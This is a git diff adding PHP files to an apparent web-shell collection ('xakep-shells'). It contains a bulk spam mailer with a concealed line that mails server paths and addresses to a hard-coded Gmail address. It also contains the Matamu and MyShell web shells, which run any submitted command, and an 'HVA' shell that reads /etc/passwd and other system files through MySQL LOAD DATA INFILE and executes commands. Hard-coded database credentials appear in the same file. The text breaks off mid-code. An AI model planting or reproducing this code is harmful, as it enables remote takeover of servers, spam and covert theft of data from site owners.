+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+
diff --git a/xakep-shells/PHP/matamu.php.txt b/xakep-shells/PHP/matamu.php.txt
new file mode 100644
index 0000000..ef13ce8
--- /dev/null
+++ b/xakep-shells/PHP/matamu.php.txt
@@ -0,0 +1,146 @@
+<?php
+
+define('PHPSHELL_VERSION', '1.7');
+
+?>
+
+<html>
+<head>
+<title> Matamu Mat </title>
+</head>
+<body>
+<hr><br>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+
+</body>
+</html>
diff --git a/xakep-shells/PHP/myshell.php.php.txt b/xakep-shells/PHP/myshell.php.php.txt
new file mode 100644
index 0000000..69d8801
--- /dev/null
+++ b/xakep-shells/PHP/myshell.php.php.txt
@@ -0,0 +1,420 @@
+<?php
+/*
+  **************************************************************
+  *                        MyShell                             *
+  **************************************************************
+  $Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
+
+  An interactive PHP-page that will execute any command entered.
+  See the files README and INSTALL or http://www.digitart.net  for
+  further information.
+  Copyright �2001 Alejandro Vasquez <admin@digitart.com.mx>
+  based on the original program phpShell by Martin Geisler
+
+  This program is free software; you can redistribute it and/or
+  modify it under the terms of the GNU General Public License
+  as published by the Free Software Foundation; either version 2
+  of the License, or (at your option) any later version.
+
+  This program is distributed in the hope that it will be useful,
+  but WITHOUT ANY WARRANTY; without even the implied warranty of
+  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+  GNU General Public License for more details.
+
+  You can get a copy of the GNU General Public License from this
+  address: http://www.gnu.org/copyleft/gpl.html#SEC1
+  You can also write to the Free Software Foundation, Inc., 59 Temple
+  Place - Suite 330, Boston, MA  02111-1307, USA.
+*/
+
+#$selfSecure enables built-in authenticate feature. This must be 0 in order to
+#use .htaccess file or other alternative method to control access to MyShell.
+#Set up your user and password using $shellUser and $shellPswd.
+#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
+#ACCESS TO THE SCRIPT.
+
+$selfSecure = 0;
+$shellUser  = "";
+$shellPswd  = "";
+
+#$adminEmail is the email address to send warning notifications in case
+#someone tries to access the script and fails to provide correct user and
+#password. This only works if you have $selfSecure enabeled.
+
+$adminEmail = "******@mail.ru";
+
+#$fromEmail is the email address warning messages are sended from.
+#This defaults to the server admin, but you can change
+#to any address you want i.e.: noreplay@yourdomain.com
+#This only works if you have $selfSecure enabeled.
+
+$fromEmail  = $HTTP_SERVER_VARS["SERVER_ADMIN"];
+
+#$dirLimit is the top directory allowed to change when using cd command
+#or the form selector. Any attempt to change to a directory up to this
+#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
+#It is a good practice to set it to $DOCUMENT_ROOT using:
+#$dirLimit = $DOCUMENT_ROOT;
+#If you want to have access to all server directories leave it blank.
+#WARNING: Althought a user won't be able to snoop on directories above
+#this level using MyShell, he/she will still be able to excecute
+#commands on any directory where Webserver has permission,
+#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
+
+$dirLimit = "";
+
+#$autoErrorTrap Enable automatic error traping if command returns error.
+#Bear in mind that MyShell executes the command a second time in order to
+#trap the stderr. This shouldn't be a problem in most cases.
+#If you turn it off, you'll have to select either to trap stderr or not for
+#every command you excecute.
+
+$autoErrorTrap = 1;
+
+#$voidCommands is the list of commands that MyShell won't run by any means.
+#It defaults to known problematic commands from a web interface like pico,
+#top, xterm but also it can include specific commands you don't want to
+#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
+
+$voidCommands  = array("top","xterm","su","vi","pico","netscape");
+
+#$TexEd Built-in Text Editor prefered name. This is the command you'll use
+#to invoke MyShell's built in text editor.
+# If you are used to type pico or vi for your fav text editor,
+#change this to your please. i.e.:
+#  $TexEd = "pico";
+#will allow you to type 'pico config.php' to edit the file config.php
+#MyShell's text editor do not support usual commands in pico, vi etc.
+#Don't forget to take off this command from the $voidCommands list
+$TexEd  = "edit";
+
+#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
+#is usefull when you have to edit files with long lines, i.e.: in php code
+#files, because otherwise it is no easy to distinguish a real new line (CR)
+#from a wraped one. If you prefer to stick to the default wraped mode of
+#TEXTAREA just leave this blank i.e.: $editWrap="".
+$editWrap ="wrap='OFF'";
+
+#Cosmetic defaults.
+
+$termCols     = 80;            //Default width of the output text area
+$termRows     = 20;            //Default heght of the output text area
+$bgColor      = "#000000";     //background color
+$bgInputColor = "#333333";     //color of the input field
+$outColor     = "#00BB00";     //color of the text output from the server
+$textColor    = "#009900";     //color of the hard texts of the terminal
+$linkColor    = "#00FF00";     //color of the links
+
+/************** No customize needed from this point *************/
+
+$MyShellVersion = "MyShell 1.1.0 build 20010923";
+if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
+if($selfSecure){
+    if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
+       Header('WWW-Authenticate: Basic realm="MyShell"');
+       Header('HTTP/1.0 401 Unauthorized');
+       echo "<html>
+         <head>
+         <title>$MyShellVersion - Access Denied</title>
+         </head>
+         <h1>Access denied</h1>
+         A warning message have been sended to the administrator
+         <hr>
+         <em>$MyShellVersion</em>";
+       if(isset($PHP_AUTH_USER)){
+          $warnMsg ="
+ This is $MyShellVersion
+ installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
+ just to let you know that somebody tryed to access
+ the script using wrong username or password:
+ 
+ Date: ".date("Y-m-d H:i:s")."
+ IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
+ User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
+ username used: $PHP_AUTH_USER
+ password used: $PHP_AUTH_PW
+ 
+ If this is not the first time it happens,
+ please consider either to remove MyShell
+ from your system or change it's name or
+ directory location on your server.
+ 
+ Regards
+ The MyShell dev team
+       ";
+          mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
+          "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
+       }
+       exit;
+    }
+}
+//Function that validate directories
+function validate_dir($dir){
+    GLOBAL $dirLimit;
+    if($dirLimit){
+        $cdPos = strpos($dir,$dirLimit);
+        if ((string)$cdPos == "") {
+            $dir = $dirLimit;
+            $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
+        }
+    }
+    return $dir;
+}
+
+// Set working directory.
+if (isset($work_dir)) {
+  //A workdir has been asked for - we chdir to that dir.
+  $work_dir = validate_dir($work_dir);
+  @chdir($work_dir) or
+      ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
+  $work_dir = exec("pwd");
+}
+else{
+  // No work_dir - we chdir to $DOCUMENT_ROOT
+  $work_dir = validate_dir($DOCUMENT_ROOT);
+  chdir($work_dir);
+  $work_dir = exec("pwd");
+}
+
+//Now we handle files if we are in Edit Mode
+if($editMode && ($command||$editCancel))$editMode=false;
+if($editMode){
+    if($editSave ||$editSaveExit){
+        if(function_exists(ini_set))ini_set("track_errors","1");
+        if($fp=@fopen($file,"w")){
+           if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
+           fputs($fp,$shellOut);
+           fclose($fp);
+           $command = $TexEd." ".$file;
+           if($editSaveExit) {
+               $command="";
+               $shellOutput="MyShell: $file: saved";
+               $editMode=false;
+           }
+       }
+       else {
+           $command="";
+           $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
+           $errorSave=true;
+       }
+    }
+}
+
+//Separate command(s) and arguments to analize first command
+$input=explode(" ",$command);
+
+while (list ($key, $val) = each ($voidCommands)) {
+    if($input[0]==$val){
+        $voidCmd = $input[0];
+        $input[0]="void";
+    }
+}
+switch($input[0]){
+    case "cd":
+       $path=$input[1];
+       if ($path==".."){
+         $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
+         if ($work_dir == "") $work_dir = "/";
+       }
+       elseif (substr($path,0,1)=="/")$work_dir=$path;
+       else $work_dir=$work_dir."/".$path;
+       $work_dir = validate_dir($work_dir);
+       @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
+       $work_dir = exec("pwd");
+       $commandBk = $command;
+       $command = "";
+       break;
+    case "man":
+       exec($command,$man);
+       if($man){
+           $codes = ".".chr(8);
+           $manual = implode("\n",$man);
+           $shellOutput = ereg_replace($codes,"",$manual);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case "cat":
+       exec($command,$cat);
+       if($cat){
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case "more":
+       exec($command,$cat);
+       if($cat){
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case $TexEd:
+       if(file_exists($input[1])){
+           exec("cat ".$input[1],$cat);
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $fileOwner = posix_getpwuid(fileowner($input[1]));
+           $filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
+           $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
+       }
+       else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>";
+       $currFile = $input[1];
+       $editMode = true;
+       $command = "";
+       break;
+    case "void":
+       $shellOutput = "MyShell: $voidCmd: void command for MyShell";
+       $commandBk = $command;
+       $command = "";
+}
+
+//Now we prepare the webpage
+if(!$oCols)$oCols=$termCols;
+if(!$oRows)$oRows=$termRows;
+if($editMode)$focus="shellOut.focus()";
+else $focus="command.select()";
+//WhoamI
+if(!$whoami)$whoami=exec("whoami");
+?>
+<html>
+<head>
+<title><?echo $MyShellVersion?></title>
+<style>
+body{
+        background-color: <?echo $bgColor ?>;
+        font-family : sans-serif;
+        font-size : 10px;
+        scrollbar-face-color: #666666;
+        scrollbar-shadow-color:  <?echo $bgColor ?>;
+        scrollbar-highlight-color: #999999;
+        scrollbar-3dlight-color:  <?echo $bgColor ?>;
+        scrollbar-darkshadow-color:  <?echo $bgColor ?>;
+        scrollbar-track-color:  <?echo $bgInputColor ?>;
+        scrollbar-arrow-color:  <?echo $textColor ?>;
+}
+input,select,option{
+        background-color: <?echo $bgInputColor ?>;
+        color : <?echo $outColor ?>;
+        border-style : none;
+        font-size : 10px;
+}
+textarea{
+        background-color: <?echo $bgColor ?>;
+        color : <?echo $outColor ?>;
+        border-style : none;
+}
+</style>
+</head>
+<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
+<form name="shell" method="post">
+Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
+<input type="hidden" name=whoami value=<?echo $whoami?>>
+&nbsp;&nbsp;:::::::&nbsp;&nbsp;
+<?
+if($editMode){
+    echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
+}
+else{
+    echo "Current working directory: <b>\n";
+    $work_dir_splitted = explode("/", substr($work_dir, 1));
+    echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
+    if ($work_dir_splitted[0] == "") {
+       $work_dir = "/";  /* Root directory. */
+    }
+    else{
+        for ($i = 0; $i < count($work_dir_splitted); $i++) {
+            $url .= "/".$work_dir_splitted[$i];
+            echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
+        }
+    }
+}
+?>
+<br>
+<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
+<?
+echo $shellOutput;
+if ($command) {
+  if ($stderr) {
+    system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+  else {
+    $ok = system($command,$status);
+    if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+}
+if ($commandBk) $command = $commandBk;
+?>
+</textarea>
+<br>
+<?
+if($editMode) echo"
+&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
+ <input type='submit' name='editSave' value='     Save     '>&nbsp;&nbsp;&nbsp;
+ <input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp;
+ <input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp;
+ <input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp;
+ <input type='hidden' name='editMode' value='true'>
+<br>";
+?>
+<br>
+Command:
+<input type="text" name="command" size="80"
+<? if ($command && $echoCommand) {
+     echo "value=`$command`";
+   }
+?> > <input name="submit_btn" type="submit" value="Go!">
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+<?
+if ($autoErrorTrap) echo "Auto error traping enabled";
+else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
+
+if($editMode){
+    echo "<input type='hidden' name='work_dir' value='$work_dir'>
+    <br>Save file as: <input type='text' name='file' value='$currFile'>";
+}
+else{
+    echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
+    // List of directories.
+    $dir_handle = opendir($work_dir);
+    while ($dir = readdir($dir_handle)) {
+      if (is_dir($dir)) {
+        if ($dir == ".")
+          echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+        elseif ($dir == "..") {
+          // Parent Dir. This might be server's root directory
+          if (strlen($work_dir) == 1) {
+            // work_dir is only 1 charecter - it can only be / so don't output anything
+          }
+          elseif (strrpos($work_dir, "/") == 0) {  // we have a top-level directory eg. /bin or /home etc...
+            echo "<option value=\"/\">Parent Directory</option>\n";
+          }
+          else {   // String-manipulation to find the parent directory... Trust me - it works :-)
+            echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+          }
+        }
+        else {
+          if ($work_dir == "/")
+            echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+          else
+            echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+        }
+      }
+    }
+    closedir($dir_handle);
+    echo "</select>";
+}
+?>
+&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
+&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
+&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
+&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
+</form>
+</body>
+</html>
diff --git a/xakep-shells/PHP/mysql.php.php.txt b/xakep-shells/PHP/mysql.php.php.txt
new file mode 100644
index 0000000..d08917a
--- /dev/null
+++ b/xakep-shells/PHP/mysql.php.php.txt
@@ -0,0 +1,1231 @@
+<?php
+// mysql config: [this is for reading files through mysql]
+$mysql_use = "yes"; //"yes" or "no"
+$mhost = "localhost";
+$muser = "kecodoc_forum";
+$mpass = "cailon";
+$mdb = "kecodoc_hce";
+
+
+// default mysql_read files [seperated by: ':']:
+$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
+$mysql_files = explode(':', $mysql_files_str);
+
+if ($action=="misc") {
+    if ($do=="phpinfo") {
+    phpinfo();
+    exit;
+    }
+}
+?>
+<html>
+<head>
+<style>
+BODY { font-family: verdana; color: cccccc; font-size: 8pt;
+scrollbar-face-color: #1c1c1c;
+scrollbar-shadow-color: #666666;
+scrollbar-highlight-color: #666666;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color: #000000;
+scrollbar-track-color: #262D34;
+scrollbar-arrow-color: #F2F5FF;
+}
+INPUT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+TEXTAREA { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+SELECT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+TABLE { color:CCCCCC; font-family:Verdana; font-size:8pt;}
+</style>
+<title>:: phpHS :: PHP HVA Shell Script ::</title>
+</head>
+<body <? if ($method!="show_source") { echo "bgcolor=\"#000000\""; } ?> text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC">
+<?
+    if (!$PHP_SELF) { $PHP_SELF="mysql.php"; /* no PHP_SELF on default freeBSD PHP 4.2.1??? */ }
+
+    if ($action=="check") {
+    echo "<pre>";
+        if ($mysql_use!="no") {
+        $phpcheck = new php_check($mhost, $muser, $mpass, $mdb);
+        } else { $phpcheck = new php_check(); }
+    echo "</pre>";
+    }
+    if ($action=="mysqlread") {
+    // $file
+
+    if (!$file) { $file = "/etc/passwd"; }
+        ?>
+        <script>
+        var files = new Array();
+        <? for($i=0;count($mysql_files)>$i;$i++) { ?>
+        files[files.length] = "<?=$mysql_files[$i]?>";
+        <? } ?>
+        function setFile(bla) {
+            for (var i=0;i < files.length;i++) {
+                if (files[i]==bla.value) {
+                    document.mysqlload.file.value = files[i];
+                }
+            }
+        }
+        </script>
+        <form name="mysqlload" action="<?=$PHP_SELF?>?action=mysqlread" method="POST">
+            <select name="deffile" onChange="setFile(this)">
+            <? for ($i=0;count($mysql_files)>$i;$i++) { ?>
+            <option value="<?=$mysql_files[$i]?>"<? if ($file==$mysql_files[$i]) { echo "selected"; } ?>><?
+            $bla = explode('/', $mysql_files[$i]);
+            $p = count($bla)-1;
+            echo $bla[$p];
+            ?></option>
+            <? } ?>
+            </select>
+        <input type="text" name="file"  value="<?=$file?>" size=80 text="#000000>
+        <input type="submit" name="go" value="go"> <font size=2>[ <a href="<?=$PHP_SELF?>?action=mysqlread&mass=loadmass">load all defaults</a> ]</font>
+        </form>
+        <?
+        echo "<pre>";
+                            // regular LOAD DATA LOCAL INFILE
+                            if (!$mass) {
+                                $sql = array (
+                                   "USE $mdb",
+
+                                   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
+
+                                   "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
+                                   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
+                                   . "ESCAPED BY          '' "
+                                   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
+
+                                   "SELECT a FROM $tbl LIMIT 1"
+                                );
+
+
+                                mysql_connect ($mhost, $muser, $mpass);
+
+                                foreach ($sql as $statement) {
+                                   $q = mysql_query ($statement);
+
+                                   if ($q == false) die (
+                                      "FAILED: " . $statement . "\n" .
+                                      "REASON: " . mysql_error () . "\n"
+                                   );
+
+                                   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
+
+                                   echo htmlspecialchars($r[0]);
+                                   mysql_free_result ($q);
+                                }
+                            }
+
+                            if ($mass) {
+                                    $file = "/etc/passwd";
+                                    $sql = array ();
+                                    $cp = mysql_connect ($mhost, $muser, $mpass);
+                                    mysql_select_db($mdb);
+                                    $tbl = "xploit";
+                                    mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)");
+                                    for($i=0;count($mysql_files)>$i;$i++) {
+                                    mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY       '__THIS_NEVER_HAPPENS__' ESCAPED BY          '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'");
+                                    }
+                                    $q = mysql_query("SELECT * FROM ".$tbl."");
+                                        while ($arr = mysql_fetch_array($q)) {
+                                        echo $arr[0]."\n";
+                                        }
+                                    mysql_query("DELETE FROM ".$tbl."");
+                                    mysql_query("DROP TABLE ".$tbl."");
+
+                            }
+    echo "</pre>";
+    }
+    if ($action=="read") {
+        if (!$method) { $method="file"; }
+        if (!$file) { $file = "/etc/passwd"; }
+    ?>
+     <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=read">
+           <select name="method">
+                <option value="file" <? if ($method=="file") { echo "selected"; } ?>>file</option>
+                <option value="fread" <? if ($method=="fread") { echo "selected"; } ?>>fread</option>
+                <option value="show_source" <? if ($method=="show_source") { echo "selected"; } ?>>show_source</option>
+                <option value="readfile" <? if ($method=="readfile") { echo "selected"; } ?>>readfile</option>
+              </select><br>
+
+            <input type="text" name="file" size="40" value="<?=$file?>">
+            <input type="submit" name="Submit" value="<?=$method?>">
+            <br>
+          </form><?
+
+
+        if ($method=="file") {
+            if (@file($file)) {
+                $filer = file($file);
+                echo "<pre>";
+                foreach ($filer as $a) { echo $a; }
+                echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
+            }
+        }
+        if ($method=="fread") {
+            if (@fopen($file, 'r')) {
+                $fp = fopen($file, 'r');
+                $string = fread($fp, filesize($file));
+                echo "<pre>";
+                echo $string;
+                echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
+            }
+        }
+        if ($method=="show_source") {
+            if (show_source($file)) {
+                //echo "<pre>";
+                //echo show_source($file);
+                //echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
+            }
+
+        }
+        if ($method=="readfile") {
+            echo "<pre>";
+            if (readfile($file)) {
+                //echo "<pre>";
+                //echo readfile($file);
+                echo "</pre>";
+            } else {
+                echo "</pre>";
+                echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
+            }
+
+        }
+
+    }
+    if ($action=="cmd") { ?>
+     <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=cmd">
+           <select name="method">
+                <option value="system" <? if ($method=="system") { echo "selected"; } ?>>system</option>
+                <option value="passthru" <? if ($method=="passthru") { echo "selected"; } ?>>passthru</option>
+                <option value="exec" <? if ($method=="exec") { echo "selected"; } ?>>exec</option>
+                <option value="shell_exec" <? if ($method=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
+                <option value="popen" <? if ($method=="popen") { echo "selected"; } ?>>popen</option>
+              </select><br>
+
+            <textarea wrap=\"off\" cols="45" rows="10" name="cmd"><?= $cmd; ?></textarea>
+            <input type="submit" name="Submit" value="<?=$method?>">
+            <br>
+          </form>
+    <?
+    if (!$method) { $method="system"; }
+    if (!$cmd) { $cmd = "ls /"; }
+    echo "<br><pre>";
+        if ($method=="system") {
+        system("$cmd 2>&1");
+        }
+        if ($method=="passthru") {
+        passthru("$cmd 2>&1");
+        }
+        if ($method=="exec") {
+            while ($string = exec("$cmd 2>&1")) {
